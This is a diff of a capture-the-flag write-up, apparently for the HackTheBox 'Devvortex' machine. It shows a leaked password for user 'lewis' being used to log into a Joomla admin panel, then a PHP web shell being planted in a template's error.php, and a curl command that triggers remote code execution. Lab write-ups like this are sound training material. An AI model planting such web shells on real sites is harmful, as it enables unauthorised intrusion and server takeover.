julio-cfa/julio-cfa.github.io/_writeups/devvortex.md

 }
 ```

-<p>User "lewis" seems to have the password "P4ntherg0t1n5r3c0n##".
+User "lewis" seems to have the password "P4ntherg0t1n5r3c0n##".
 We can use it to successfully login to Joomla on "/administrator".
-We tried to SSH into the machine as well with these credentials but it did not work.</p>
+We tried to SSH into the machine as well with these credentials but it did not work.

-<p>After logging into Joomla, Lewis seems to be part of the super users - which means that we have admin privileges.
+After logging into Joomla, Lewis seems to be part of the super users - which means that we have admin privileges.
 We can go to "System > Templates > Site Templates > Cassiopeia Details and Files > error.php".
-We can then add <custom-code>system($_GET['cmd']);</custom-code> to second line of the code and save it.</p>
+We can then add `system($_GET['cmd']);` to second line of the code and save it.

-<p>To finally achieve remote code execution (RCE), we can run:</p>
+To finally achieve remote code execution (RCE), we can run:

 ```bash
 curl -s "http://dev.devvortex.htb/templates/cassiopeia/error.php?cmd=whoami"